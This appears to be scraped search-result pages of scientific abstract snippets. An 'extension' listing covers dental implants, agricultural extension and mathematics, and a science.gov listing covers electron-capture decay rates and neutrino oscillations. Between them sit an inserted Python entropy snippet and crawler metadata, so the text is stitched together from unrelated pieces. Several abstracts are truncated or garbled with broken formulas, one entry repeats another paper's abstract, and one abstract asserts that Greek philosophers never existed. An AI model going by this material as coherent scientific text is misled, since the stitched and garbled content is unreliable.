Full Text Available In mandibular edentulous patients, treatment based on immediate loading with rigid splinting in the mandible is well accepted; however, it is cost and time dependent, which sometimes limits this type of rehabilitation. To overcome these problems, the technique of immediate loading using a semirigid splinting extension system has been developed. 
Its advantages include low cost, technical feasibility, and reduced clinic time. This clinical report presents the applicability and the predictability of semirigid splinting of implants in the mandibular arch of an edentulous patient using a distal extension bar prosthesis system. 6. Natural extensions and entropy of α-continued fractions International Nuclear Information System (INIS) Kraaikamp, Cor; Schmidt, Thomas A; Steiner, Wolfgang 2012-01-01 We construct a natural extension for each of Nakada's α-continued fraction transformations and show the continuity as a function of α of both the entropy and the measure of the natural extension domain with respect to the density function (1 + xy) −2 . For 0 2 /6. We show that the interval (3-√5)/2≤α≤(1+√5)/2 is a maximal interval upon which the entropy is constant. As a key step for all this, we give the explicit relationship between the α-expansion of α − 1 and of α. (paper) 7. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) LPhidza environment. “Sustainability is to leave future generations as many, if not more, opportunities. 7 PhD student, Centre for Sustainable Agriculture, Rural Development and Extension, University of the Free ..... (University of the Free State). THI, N. 2008. Migration of youth to Ho Chi Minh City, Vietnam. PhD Thesis submitted to. 8. Revisiting the quality of Health Extension Workers' training: Case ... African Journals Online (AJOL) admin Background:- Ethiopia has been training community health workers, locally under its program of Health Extension. Workers, in Technical and ... Results:- The study showed that the curriculum for the training had not been revised since it was developed. Shortage .... barrier. I prepared exam questions in English, but some. 9. A Basic Elementary Extension of the Duchet-Meyniel Theorem DEFF Research Database (Denmark) Pedersen, Anders Sune; Toft, Bjarne 2010-01-01$ by $2\\alpha - 2$ when $\\alpha$ is at least 3. In this paper a basic elementary extension of the Theorem of Duchet and Meyniel is presented. This may be of help to avoid dealing with basic cases when looking for more substantial improvements. The main unsolved problem (due to Seymour) is to improve, even... 10. Polymeric liquids in extension: fluid mechanics or rheometry? DEFF Research Database (Denmark) Hassager, Ole; Marin, Jose Martin Roman; Yu, Kaijia 2010-01-01 to be more uniaxial with IA invoked. As a second illustration of the techniques, we simulate the phenomenon of delayed rupture after rapid extension of entangled polymer systems. It is demonstrated that this phenomenon can be explained on the basis of the Doi-Edwards model in terms of a Considere... 11. Greater Awareness--Extension's Key to Program Success. Science.gov (United States) Coward, Raymond T. 1978-01-01 To find why adults do or do not attend extension programs, the author surveyed a sample of families in metropolitan and nonmetropolitan areas of Indiana to determine their perceived educational needs, program priorities, and delivery preferences in the major areas of home economics. Survey results and their implications are discussed. (MF) 12. Journal of Agricultural Extension Vol.17 (2) December, 2013 ISSN ... African Journals Online (AJOL) ONIKOYI (refers to crop and animal husbandry workers), 43 veterinary surgeons and one sociologist. The study was conducted ... veterinarians who were available were interviewed. Data collection was done using a .... 
organization, such as type of training provided to extension workers, salary decisions, and opportunities for further ... 13. Pythagoras did not coin the word "Philosophia" (By extension and ... African Journals Online (AJOL) The study primarily states that Pythagoras, the classical – Greek Philosopher of C500BC did not coin the word “Philosophia”: By extension, our research hypothesis clearly states, (1) H0: that Pythagoras and classical Greek philosophers never existed (Philops: 1953) particularly they have no historical record but only ... 14. Speciation with gene flow in equids despite extensive chromosomal plasticity DEFF Research Database (Denmark) Jáónsson, Hákon; Schubert, Mikkel; Seguin-Orlando, Andaine 2014-01-01 Significance Thirty years after the first DNA fragment from the extinct quagga zebra was sequenced, we set another milestone in equine genomics by sequencing its entire genome, along with the genomes of the surviving equine species. This extensive dataset allows us to decipher the genetic makeup... 15. Participatory Contact Farmer Selection: Survey of two Extension ... African Journals Online (AJOL) This paper tested individual and group socio-metric nomination of potential contact farmers and compared the nominations with the CFs working in two extension circles. It was shown that only three (3) CFs out of eight (8) in the study appeared on both the individual and group nominations. It was recommended that EAs ... 16. Farmworkers' Irrigation Schools: An Extension Model for Hispanic Farm Laborers. Science.gov (United States) Youmans, David; And Others 1982-01-01 Describes a model for Hispanic farm laborer irrigation schools that was developed, implemented, and evaluated by cooperative extension personnel. Success of the approach was due to attention to critical elements in the model, which is applicable to other adult basic education programs. (JOW) 17. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) LPhidza The public extension service in the Eastern Cape Province is in vital need of revitalization if it is to transform the unproductive smallholder-agriculture sector into a more commercially- orientated sector. The research used a Logical Framework Analysis (LFA) enquiry to determine the problems smallholder farmers face as ... 18. Horava-Lifshitz-like extensions of supersymmetric theories Science.gov (United States) Gomes, M.; Nascimento, J. R.; Petrov, A. Yu.; da Silva, A. J. 2014-12-01 Within the superfield approach, we formulate two different extensions of the Wess-Zumino model and super-QED with Horava-Lifshitz-like additive terms, discuss their quantum properties and calculate lower contributions to the effective action. In the case of the gauge theory, the one-loop effective potential turns out to be gauge independent. 19. Idiopathic extensive peliosis hepatis treated with liver transplantation DEFF Research Database (Denmark) Hyodo, Masanobu; Mogensen, Anne Mellon; Larsen, Peter Nørgaard 2004-01-01 complicating liver cirrhosis. Extensive peliosis with liver cirrhosis is a rare condition. Only two cases, caused by contraceptives and treated by liver transplantation, are reported in the English-language literature. We could find no cause other than alcohol abuse lasting several years in this patient... 20. On the maximum entropy principle in non-extensive thermostatistics OpenAIRE Naudts, Jan 2004-01-01 It is possible to derive the maximum entropy principle from thermodynamic stability requirements. 
Using as a starting point the equilibrium probability distribution, currently used in non-extensive thermostatistics, it turns out that the relevant entropy function is Rényi's α-entropy, and not Tsallis' entropy.
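As a concrete illustration of the two functionals contrasted in the preceding abstract, the short sketch below computes the Tsallis and Rényi entropies of a discrete distribution and checks the standard monotonic relation between them, which is why maximizing one under fixed constraints also maximizes the other. It is not code from the cited work; the probability vector, the value of q, and the helper names are arbitrary choices for demonstration.

```python
import numpy as np

def tsallis_entropy(p, q):
    """S_q = (1 - sum_i p_i^q) / (q - 1); reduces to Shannon entropy as q -> 1."""
    p = np.asarray(p, dtype=float)
    return (1.0 - np.sum(p ** q)) / (q - 1.0)

def renyi_entropy(p, q):
    """H_q = ln(sum_i p_i^q) / (1 - q); also reduces to Shannon entropy as q -> 1."""
    p = np.asarray(p, dtype=float)
    return np.log(np.sum(p ** q)) / (1.0 - q)

# Arbitrary example distribution and entropic index (illustration only).
p = [0.5, 0.3, 0.2]
q = 1.5

S_q = tsallis_entropy(p, q)
H_q = renyi_entropy(p, q)

# Monotonic relation between the two: H_q = ln(1 + (1 - q) S_q) / (1 - q).
assert np.isclose(H_q, np.log(1.0 + (1.0 - q) * S_q) / (1.0 - q))
print(f"Tsallis S_q = {S_q:.4f}, Renyi H_q = {H_q:.4f}")
```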
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4194348156452179, "perplexity": 5682.33720695064}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-26/segments/1529267863100.8/warc/CC-MAIN-20180619154023-20180619174023-00598.warc.gz"}
https://www.science.gov/topicpages/c/capture+decay+rates.html
#### Sample records for capture decay rates

1. Oscillating decay rate in electron capture and the neutrino mass difference Peshkin, Murray 2015-04-01 Reported oscillations in the rate of decay of certain ions by K-electron capture have raised questions about whether and how such oscillations can arise in quantum-mechanical theory and whether they can measure the neutrino mass difference. Here I show that simple principles of quantum mechanics answer some questions and clarify what must be done theoretically or experimentally to answer some others. The principal result is that quantum mechanics does allow mass-difference-dependent oscillations in principle, but it imposes conditions not obeyed by the approximate dynamical models that have been put forth up to now. In particular, indirect coupling between two neutrino mass channels must be taken into account. What needs to be done experimentally and theoretically is discussed.

2. Radioactive decay speedup at T = 5 K: electron-capture decay rate of ^7Be encapsulated in C60. PubMed Ohtsuki, T; Ohno, K; Morisato, T; Mitsugashira, T; Hirose, K; Yuki, H; Kasagi, J 2007-06-22 The electron-capture (EC) decay rate of ^7Be in C60 at the temperature of liquid helium (T = 5 K) was measured and compared with the rate in Be metal at T = 293 K. We found that the half-life of ^7Be in endohedral C60 (^7Be@C60) at a temperature close to T = 5 K is 52.47 ± 0.04 d, a value 0.34% shorter than that at T = 293 K. In this environment, the decay of ^7Be is nearly 1.5% faster than inside Be metal at room temperature (T = 293 K). We then interpreted our observations in terms of calculations of the electron density at the ^7Be nucleus position inside the C60; further, we estimated theoretically the temperature dependence (at T = 0 K and 293 K) of the electron density at the Be nucleus position in the stable center inside C60. The theoretical estimates were nearly in agreement with the experimental observations.

3. Time Modulation of the K-Shell Electron Capture Decay Rates of H-like Heavy Ions at GSI Experiments SciTech Connect Ivanov, A. N.; Kienle, P. 2009-08-07 According to experimental data at GSI, the rates of the number of daughter ions, produced by the nuclear K-shell electron capture decays of the H-like heavy ions with one electron in the K shell, such as ^140Pr^58+, ^142Pm^60+, and ^122I^52+, are modulated in time with periods T_EC of the order of a few seconds, obeying an A scaling T_EC = A/20 s, where A is the mass number of the mother nuclei, and with amplitudes a_d^EC ≈ 0.21. We show that these data can be explained in terms of the interference of two massive neutrino mass eigenstates. The appearance of the interference term is due to overlap of massive neutrino mass eigenstate energies and of the wave functions of the daughter ions in two-body decay channels, caused by the energy and momentum uncertainties introduced by time-differential detection of the daughter ions in GSI experiments.

4. Measurement of the β+ and Orbital Electron-Capture Decay Rates in Fully Ionized, Hydrogenlike, and Heliumlike ^140Pr Ions SciTech Connect Litvinov, Yu. A.; Geissel, H.; Winckler, N.; Knoebel, R.; Litvinov, S. A.; Scheidenberger, C.; Bosch, F.; Beckert, K.; Brandau, C.; Dimopoulou, C.; Hess, S.; Kozhuharov, C.; Mazzocco, M.; Nociforo, C.; Nolden, F.; Prochazka, A.; Reuschl, R.; Steck, M.; Stoehlker, T.; Trassinelli, M.
2007-12-31 We report on the first measurement of the β+ and orbital electron-capture decay rates of ^140Pr nuclei with the simplest electron configurations: bare nuclei, hydrogenlike, and heliumlike ions. The measured electron-capture decay constant of hydrogenlike ^140Pr^58+ ions is about 50% larger than that of heliumlike ^140Pr^57+ ions. Moreover, ^140Pr ions with one bound electron decay faster than neutral ^140Pr^0+ atoms with 59 electrons. To explain this peculiar observation one has to take into account the conservation of the total angular momentum, since only particular spin orientations of the nucleus and of the captured electron can contribute to the allowed decay.

5. Electron-Capture and β-Decay Rates for sd-Shell Nuclei in Stellar Environments Relevant to High-Density O–Ne–Mg Cores SciTech Connect Suzuki, Toshio; Toki, Hiroshi; Nomoto, Ken'ichi 2016-02-01 Electron-capture and β-decay rates for nuclear pairs in the sd-shell are evaluated at high densities and high temperatures relevant to the final evolution of electron-degenerate O–Ne–Mg cores of stars with initial masses of 8–10 M⊙. Electron capture induces a rapid contraction of the electron-degenerate O–Ne–Mg core. The outcome of rapid contraction depends on the evolutionary changes in the central density and temperature, which are determined by the competing processes of contraction, cooling, and heating. The fate of the stars is determined by these competitions, whether they end up with electron-capture supernovae or Fe core-collapse supernovae. Since the competing processes are induced by electron capture and β-decay, the accurate weak rates are crucially important. The rates are obtained for pairs with A = 20, 23, 24, 25, and 27 by shell-model calculations in the sd-shell with the USDB Hamiltonian. Effects of Coulomb corrections on the rates are evaluated. The rates for pairs with A = 23 and 25 are important for nuclear Urca processes that determine the cooling rate of the O–Ne–Mg core, while those for pairs with A = 20 and 24 are important for the core contraction and heat generation rates in the core. We provide these nuclear rates at stellar environments in tables with fine enough meshes at various densities and temperatures for studies of astrophysical processes sensitive to the rates. In particular, the accurate rate tables are crucially important for the final fates of not only O–Ne–Mg cores but also a wider range of stars, such as C–O cores of lower-mass stars.

6. Capture and decay of electroweak WIMPonium Asadi, Pouya; Baumgart, Matthew; Fitzpatrick, Patrick J.; Krupczak, Emmett; Slatyer, Tracy R. 2017-02-01 The spectrum of Weakly-Interacting-Massive-Particle (WIMP) dark matter generically possesses bound states when the WIMP mass becomes sufficiently large relative to the mass of the electroweak gauge bosons. The presence of these bound states enhances the annihilation rate via resonances in the Sommerfeld enhancement, but they can also be produced directly with the emission of a low-energy photon. In this work we compute the rate for SU(2) triplet dark matter (the wino) to bind into WIMPonium—which is possible via single-photon emission for wino masses above 5 TeV for relative velocity v < O(10^-2)—and study the subsequent decays of these bound states. We present results with applications beyond the wino case, e.g.
for dark matter inhabiting a nonabelian dark sector; these include analytic capture and transition rates for general dark sectors in the limit of vanishing force carrier mass, efficient numerical routines for calculating positive- and negative-energy eigenstates of a Hamiltonian containing interactions with both massive and massless force carriers, and a study of the scaling of bound state formation in the short-range Hulthén potential. In the specific case of the wino, we find that the rate for bound state formation is suppressed relative to direct annihilation, and so provides only a small correction to the overall annihilation rate. The soft photons radiated by the capture process and by bound state transitions could permit measurement of the dark matter's quantum numbers; for wino-like dark matter, such photons are rare, but might be observable by a future ground-based gamma-ray telescope combining large effective area and a low energy threshold.

7. Comment on 'Time modulation of K-shell electron capture decay rates of H-like heavy ions at GSI experiments' SciTech Connect Lipkin, H. J.; Physics; Weizmann Inst. of Science; Tel Aviv Univ. 2010-04-16 A Comment on the Letter by A. N. Ivanov and P. Kienle, Physical Review Letters, volume 103, issue 6, 062502 (2009). The authors of the Letter offer a Reply. According to experimental data at GSI, the rates of the number of daughter ions, produced by the nuclear K-shell electron capture decays of the H-like heavy ions with one electron in the K shell, such as ^140Pr^58+, ^142Pm^60+, and ^122I^52+, are modulated in time with periods T_EC of the order of a few seconds, obeying an A scaling T_EC = A/20 s, where A is the mass number of the mother nuclei, and with amplitudes a_d^EC ≈ 0.21. We show that these data can be explained in terms of the interference of two massive neutrino mass eigenstates. The appearance of the interference term is due to overlap of massive neutrino mass eigenstate energies and of the wave functions of the daughter ions in two-body decay channels, caused by the energy and momentum uncertainties introduced by time-differential detection of the daughter ions in GSI experiments.

8. Decay curve study in a standard electron capture decay SciTech Connect Nishimura, D.; Fukuda, M.; Kisamori, K.; Kuwada, Y.; Makisaka, K.; Matsumiya, R.; Matsuta, K.; Mihara, M.; Takagi, A.; Yokoyama, R.; Izumikawa, T.; Ohtsubo, T.; Suzuki, T.; Yamaguchi, T. 2010-05-12 We have searched for a time-modulated decay in a standard electron capture experiment for ^140Pr, in order to confirm a report from GSI, where an oscillatory decay has been observed for hydrogen-like ^140Pr and ^142Pm ions in the cooler storage ring. ^140Pr has been produced with the ^140Ce(p,n) reaction by a pulsed proton beam accelerated from the Van de Graaff accelerator at Osaka University. The resultant time dependence of the Kα and Kβ X-ray intensities from the daughter shows no oscillatory behavior.

9. Electron Capture Reactions and Beta Decays in Stellar Environments SciTech Connect Suzuki, T.; Mao, H.; Honma, M.; Yoshida, T.; Kajino, T.; Otsuka, T. 2011-10-28 Electron capture reactions on Ni and Co isotopes are investigated by shell model calculations in stellar environments. The capture rates depend sensitively on the distribution of the Gamow-Teller (GT) strength.
The capture rates obtained by using GXPF1J Hamiltonian for fp-shell are found to be consistent with the rates obtained from experimental GT strength in {sup 58}Ni and {sup 60}Ni. Capture rates in Co isotopes, where there were large discrepancies among previous calculations, are also investigated. Beta decays of the N = 126 isotones are studied by shell model calculations taking into account both the GT and first-forbidden (FF) transitions. The FF transitions are found to be important to reduce the half-lives by twice to several times of those by the GT contributions only. Implications of the short half-lives of the waiting point nuclei on the r-process nucleosynthesis are discussed for various astrophysical conditions. 10. Precision Measurement of Nuclear Electron Capture Decay Koltick, David; Liu, Shih-Chieh; Wang, Haoyu; Heim, Jordan; Nistor, Jonathan 2017-01-01 The method of accurately measuring the radioactive decay constant of a isotope by measuring the decay rate as a function of time requires that both the detector and environment be stable over time periods comparable to the life-time of the isotope. In addition statistical accuracy requires initial counting rates be high but limited by the dead time capability of the data collection system and the detectors double-event resolving time. A High Purity Germanium (HPGe) spectrometer, sensitive to radiation from 3-KeV to over 3-MeV, has been built to measure radioactive decay constants to a level of 10-5 10-6 at a location only 6 meters from the core of the High Flux Isotope Reactor located at Oak Ridge National Laboratory. Such accuracy requires understanding of, background, signal-processing algorithms, and both the double and triple event pile-up in the observed spectrum. The approach taken is to fit the collected energy spectrum with invariant shapes, independent of event rate. By fixing the source-detector geometry and environmental conditions, the invariant shapes are (1) ideal energy spectrum without pile-up and background, (2) the ideal double event pile-up spectrum, (3) the ideal triple event pile-up spectrum, and (4) the stable background spectrum. A method is presented that finds these ideal shapes using the collected data in situ. Taking this approach the HPGe detector photopeak shape in the absence of background and pile-up is presented showing associated structure over a range of 7 orders of magnitude. 11. Structure and Decay at Rapid Proton Capture Waiting Points Hove, D.; Garrido, E.; Jensen, A. S.; Fynbo, H. O. U.; Fedorov, D. V.; Zinner, N. T. 2017-01-01 We investigate the region of the nuclear chart around A ˜eq 70 from a three-body perspective, where we compute reaction rates for the radiative capture of two protons. One key quantity is here the photon dissociation cross section for the inverse process where two protons are liberated from the borromean nucleus by photon bombardment. We find a number of peaks at low photon energy in this cross section where each peak is located at the energy corresponding to population of a three-body resonance. Thus, for these energies the decay or capture processes proceed through these resonances. However, the next step in the dissociation process still has the option of following several paths, that is either sequential decay by emission of one proton at a time with an intermediate two-body resonance as stepping stone, or direct decay into the continuum of both protons simultaneously. 
The astrophysical reaction rate is obtained by folding of the cross section as function of energy with the occupation probability for a Maxwell-Boltzmann temperature distribution. The reaction rate is then a function of temperature, and of course depending on the underlying three-body bound state and resonance structures. We show that a very simple formula at low temperature reproduces the elaborate numerically computed reaction rate. 12. Electron capture decay of {sup 116}In and nuclear structure of double {beta} decays SciTech Connect Bhattacharya, M.; Garcia, A.; Ortiz, C.E.; Kaloskamis, N.I.; Hindi, M.M.; Norman, E.B.; Davids, C.N.; Civitarese, O.; Suhonen, J. 1998-08-01 Quasiparticle-random-phase-approximation (QRPA) calculations of double {beta} decays have not been able to reproduce data in the A=100 system. We propose the A=116 system{emdash}because of its smaller deformation{emdash}as a simpler system to test QRPA calculations. We present results of two experiments we performed, which determine the electron-capture-decay branch of {sup 116}In to be (2.27{plus_minus}0.63){times}10{sup {minus}2}{percent}, from which we deduce logft=4.39{sub {minus}0.15}{sup +0.10}. We present QRPA calculations and compare their predictions to experimental data. Finally we use these calculations to predict the 2{nu} double-{beta}-decay rate of {sup 116}Cd to the ground and excited states of {sup 116}Sn. {copyright} {ital 1998} {ital The American Physical Society} 13. Californium-252 neutron capture and decay methods for elemental analysis NASA Technical Reports Server (NTRS) 1972-01-01 The feasibility of using a Cf-252 neutron source in conjunction with a capture and/or decay gamma ray method for elemental analysis on lunar or planetary missions was tested. The general problems of using a Cf-252 neutron source for both decay and capture gamma ray analysis in terrestrial environments included the determination of the capture gamma ray spectra by neutron absorption in various metals used for the space hardware, Cf-252 source encapsulation materials, shielding, geometry, and optimum source size for a space mission. Computer data reduction and data transmission techniques were also investigated. 14. Measuring radiative capture rates at DRAGON Hager, U.; Davids, B.; Fallis, J.; Greife, U.; Hutcheon, D. A.; Rojas, A.; Ruiz, C. 2013-04-01 The DRAGON recoil separator facility is located at the ISAC facility at TRIUMF, Vancouver. It is designed to measure radiative alpha and proton capture reactions of astrophysical importance in inverse kinematics. The Supernanogan ion source at ISAC provides stable beams of high intensities. The DRAGON collaboration has taken advantage of this over the last years by measuring several reactions requiring high-intensity stable oxygen beams. In particular,the ^17O(p,γ) and ^16O(α,γ) reaction rates were recently measured. The former reaction is part of the hot CNO cycle, and strongly influences the abundance of ^18F in classical novae. Because of its relatively long lifetime, ^18F is a possible target for satellite-based gamma-ray spectroscopy. The ^16O(α,γ) reaction plays a role in steady-state helium burning in massive stars, where it follows the ^12C(α,γ) reaction. At astrophysically relevant energies, the reaction proceeds exclusively via direct capture, resulting in a low rate. In both cases, the unique capabilities of DRAGON enabled determination not only of the total reaction rates, but also of decay branching ratios. Results from both experiments will be presented. 15. 
Electron-capture decay of [sup 100]Tc and the double-[beta] decay of [sup 100]Mo SciTech Connect Garcia, A.; Chan, Y.; da Cruz, M.T.F.; Larimer, R.M.; Lesko, K.T.; Norman, E.B.; Stokstad, R.G.; Wietfeldt, F.E.; Zlimen, I.; Moltz, D.M.; Batchelder, J.; Ognibene, T.J. ); Hindi, M.M. ) 1993-06-01 We have measured the electron-capture decay branch of [sup 100]Tc to be (1.8[plus minus]0.9)[times]10[sup [minus]3]%, from which we deduce log[ital ft]=4.45[sub [minus]0.30][sup +0.18]. This indicates that a two-step process connecting only the ground states of [sup 100]Mo-[sup 100]Tc-[sup 100]Ru can account for the measured 2[nu] double-[beta]-decay rate of [sup 100]Mo. 16. Searching for Experimental Verification of the Oscillation of Electron Capture Decay Probability Vetter, Paul 2009-05-01 A group from Gesellschaft f"ur Schwerionenforschung (GSI) last year published an observation of time oscillations of the electron capture decay rate of stored hydrogen-like ions of ^142Pm and ^140Pr.(Phys. Lett. B 664, 162 (2008)). They proposed that the oscillating decay rate was caused by interference between momentum states of the ion caused by neutrino mass and flavor mixing. This hypothesis has been controversial, with several authors arguing either that neutrino mixing can or cannot be responsible. If neutrino mixing is responsible for the decay rate oscillations, then it should be possible to detect these oscillations in a simpler experiment without using stored hydrogenic ions, by observing an electron capture decay rate with an appropriate experiment time structure. If this were possible, it could revolutionize the study of neutrino mixing by allowing much simpler experiments to make precise measurements of mass differences and mixing angles. At LBNL, we performed an experiment to search for oscillations in electron capture rate using ^142Pm produced with a time short compared to the oscillation period, and counting ^142Nd Kα x-rays from the daughter. The decay time spectrum is well-described by a simple exponential, and we observed no statistically significant decay rate oscillations at a level much lower than proposed. A literature search for previous experiments that might have been sensitive to the reported modulation uncovered a candidate in ^142Eu. A reanalysis of that published data shows no decay rate oscillation. A recent experiment at Munich also did not observe decay rate oscillations in decays of ^180Re. Other potential explanations for the GSI decay oscillation data have been proposed, including quantum beats by nearly degenerate initial parent ion states and Thomas precession in the stored ions. I will discuss the status of experimental results, and possibilities for experimental confirmation of the various models. This work was supported by 17. On decay constants and orbital distance to the Sun—part III: beta plus and electron capture decay Pommé, S.; Stroh, H.; Paepen, J.; Van Ammel, R.; Marouli, M.; Altzitzoglou, T.; Hult, M.; Kossert, K.; Nähle, O.; Schrader, H.; Juget, F.; Bailat, C.; Nedjadi, Y.; Bochud, F.; Buchillier, T.; Michotte, C.; Courte, S.; van Rooy, M. W.; van Staden, M. J.; Lubbe, J.; Simpson, B. R. S.; Fazio, A.; De Felice, P.; Jackson, T. W.; Van Wyngaardt, W. M.; Reinhard, M. I.; Golya, J.; Bourke, S.; Roy, T.; Galea, R.; Keightley, J. D.; Ferreira, K. M.; Collins, S. M.; Ceccatelli, A.; Verheyen, L.; Bruggeman, M.; Vodenik, B.; Korun, M.; Chisté, V.; Amiot, M.-N. 
2017-02-01 The hypothesis that seasonal changes in proximity to the Sun cause variation of decay constants at permille level has been tested for radionuclides disintegrating through electron capture and beta plus decay. Activity measurements of 22Na, 54Mn, 55Fe, 57Co, 65Zn, 82+85Sr, 90Sr, 109Cd, 124Sb, 133Ba, 152Eu, and 207Bi sources were repeated over periods from 200 d up to more than four decades at 14 laboratories across the globe. Residuals from the exponential nuclear decay curves were inspected for annual oscillations. Systematic deviations from a purely exponential decay curve differ from one data set to another and appear attributable to instabilities in the instrumentation and measurement conditions. Oscillations in phase with Earth’s orbital distance to the sun could not be observed within 10-4-10-5 range precision. The most stable activity measurements of β + and EC decaying sources set an upper limit of 0.006% or less to the amplitude of annual oscillations in the decay rate. There are no apparent indications for systematic oscillations at a level of weeks or months. 18. Ratios of heavy hadron semileptonic decay rates SciTech Connect Gronau, Michael; Rosner, Jonathan L. 2011-02-01 Ratios of charmed meson and baryon semileptonic decay rates appear to be satisfactorily described by considering only the lowest-lying (S-wave) hadronic final states and assuming the kinematic factor describing phase space suppression is the same as that for free quarks. For example, the rate for D{sub s} semileptonic decay is known to be (17.0{+-}5.3)% lower than those for D{sup 0} or D{sup +}, and the model accounts for this difference. When applied to hadrons containing b quarks, this method implies that the B{sub s} semileptonic decay rate is about 1% higher than that of the nonstrange B mesons. This small difference thus suggests surprisingly good local quark-hadron duality for B semileptonic decays, complementing the expectation based on inclusive quark-hadron duality that these differences in rates should not exceed a few tenths of a percent. For {Lambda}{sub b} semileptonic decay, however, the inclusive rate is predicted to be about 13% greater than that of the nonstrange B mesons. This value, representing a considerable departure from a calculation using a heavy-quark expansion, is close to the corresponding experimental ratio {Gamma}({Lambda}{sub b})/{Gamma}(B)=1.13{+-}0.03 of total decay rates. 19. On the decay rate of sunspots Chapman, G. A.; Dobias, J. J.; Preminger, D. G.; Walton, S. R. 2003-02-01 We have analyzed the decay of 32 sunspots observed during the years 1988 through 2001 at the San Fernando Observatory (SFO). The data are from digital images obtained in the red (672 nm) with the Cartesian Full Disk Telescope No.1 (CFDT1). We find that the rate of decay is strongly correlated with the total sunspot area and the umbral to total area ratio. The multiple correlation coefficient is 0.93. Thus, the unexplained variance from this simple model is (1-0.87). We find that for the sunspots of this study, the decay rate is not a constant and that there is no significant correlation between the decay rate and the square root of the total spot area. 20. Top-down holographic glueball decay rates Brünner, F.; Parganlija, D.; Rebhan, A. 2016-01-01 We present new results on the decay patterns of scalar and tensor glueballs in the top-down holographic Witten-Sakai-Sugimoto model. 
This model, which has only one free dimensionless parameter, gives semi-quantitative predictions for the vector meson spectrum, their decay widths, and also a gluon condensate in agreement with SVZ sum rules. The holographic predictions for scalar glueball decay rates are compared with experimental data for the widely discussed gluon candidates f0(1500) and f0(1710). 1. Top-down holographic glueball decay rates SciTech Connect Brünner, F.; Parganlija, D.; Rebhan, A. 2016-01-22 We present new results on the decay patterns of scalar and tensor glueballs in the top-down holographic Witten-Sakai-Sugimoto model. This model, which has only one free dimensionless parameter, gives semi-quantitative predictions for the vector meson spectrum, their decay widths, and also a gluon condensate in agreement with SVZ sum rules. The holographic predictions for scalar glueball decay rates are compared with experimental data for the widely discussed gluon candidates f{sub 0}(1500) and f{sub 0}(1710) 2. Systematic muon capture rates in PQRPA SciTech Connect Samana, A. R.; Sande, D.; Krmpotić, F. 2015-05-15 In this work we performed a systematic study of the inclusive muon capture rates for several nuclei with A < 60 using the Projected Random Quasi-particle Phase Approximation (PQRPA) as nuclear model, because it is the only RPA model that treats the Pauli Principle correctly. We reckon that the comparison between theory and data for the inclusive muon capture is not a fully satisfactory test on the nuclear model that is used. The exclusive muon transitions are more robust for such a purpose. 3. Power spectrum analyses of nuclear decay rates Javorsek, D.; Sturrock, P. A.; Lasenby, R. N.; Lasenby, A. N.; Buncher, J. B.; Fischbach, E.; Gruenwald, J. T.; Hoft, A. W.; Horan, T. J.; Jenkins, J. H.; Kerford, J. L.; Lee, R. H.; Longman, A.; Mattes, J. J.; Morreale, B. L.; Morris, D. B.; Mudry, R. N.; Newport, J. R.; O'Keefe, D.; Petrelli, M. A.; Silver, M. A.; Stewart, C. A.; Terry, B. 2010-10-01 We provide the results from a spectral analysis of nuclear decay data displaying annually varying periodic fluctuations. The analyzed data were obtained from three distinct data sets: 32Si and 36Cl decays reported by an experiment performed at the Brookhaven National Laboratory (BNL), 56Mn decay reported by the Children's Nutrition Research Center (CNRC), but also performed at BNL, and 226Ra decay reported by an experiment performed at the Physikalisch-Technische Bundesanstalt (PTB) in Germany. All three data sets exhibit the same primary frequency mode consisting of an annual period. Additional spectral comparisons of the data to local ambient temperature, atmospheric pressure, relative humidity, Earth-Sun distance, and their reciprocals were performed. No common phases were found between the factors investigated and those exhibited by the nuclear decay data. This suggests that either a combination of factors was responsible, or that, if it was a single factor, its effects on the decay rate experiments are not a direct synchronous modulation. We conclude that the annual periodicity in these data sets is a real effect, but that further study involving additional carefully controlled experiments will be needed to establish its origin. 4. MAGNETIC FIELD-DECAY-INDUCED ELECTRON CAPTURES: A STRONG HEAT SOURCE IN MAGNETAR CRUSTS SciTech Connect Cooper, Randall L.; Kaplan, David L. E-mail: [email protected] 2010-01-10 We propose a new heating mechanism in magnetar crusts. 
Magnetars' crustal magnetic fields are much stronger than their surface fields; therefore, magnetic pressure partially supports the crust against gravity. The crust loses magnetic pressure support as the field decays and must compensate by increasing the electron degeneracy pressure; the accompanying increase in the electron Fermi energy induces nonequilibrium, exothermic electron captures. The total heat released via field-decay electron captures is comparable to the total magnetic energy in the crust. Thus, field-decay electron captures are an important, if not the primary, mechanism powering magnetars' soft X-ray emission. 5. Electron capture branching ratio measurements in an ion trap for double beta decay experiments at TITAN Brunner, T.; Brodeur, M.; Champagne, C.; Frekers, D.; Krücken, R.; Lapierre, A.; Delheij, P.; Ringle, R.; Ryjkov, V.; Smith, M.; Tanihata, I.; Dilling, J. 2008-10-01 Double beta decay (ββ) is a nuclear decay mode expected to appear in at least two varieties, the double-neutrino (2ν) and the zero-neutrino (0ν) mode. The 0νββ-decay is of particular interest as it requires the neutrino to be a Majorana particle. The search for such a decay is presently being carried out or planned in a number of experiments, such as EXO, MAJORANA, GERDA, CUORE, COBRA, NEMO-III and SNO+. The 0ν-decay rate depends on the neutrino mass but, unfortunately, also on a rather complex nuclear matrix element, making the extraction of the mass heavily dependent on the underlying theoretical nuclear model. However, all theoretical models can readily be tested against the 2ν mode, which, unlike its 0ν counterpart, only involves simple Gamow Teller nuclear matrix elements. These elements can be determined experimentally either through charge-exchange reactions or, for the ground-state transition, through the electron capture (EC) or single β-decay of the intermediate odd odd nucleus. The present program is geared towards the measurement of the EC branching ratios (BR). In most cases, these ratios are poorly known or not known at all, because EC is usually suppressed by several orders of magnitude compared to the β-decay counterpart due to energy considerations. Traditional methods for 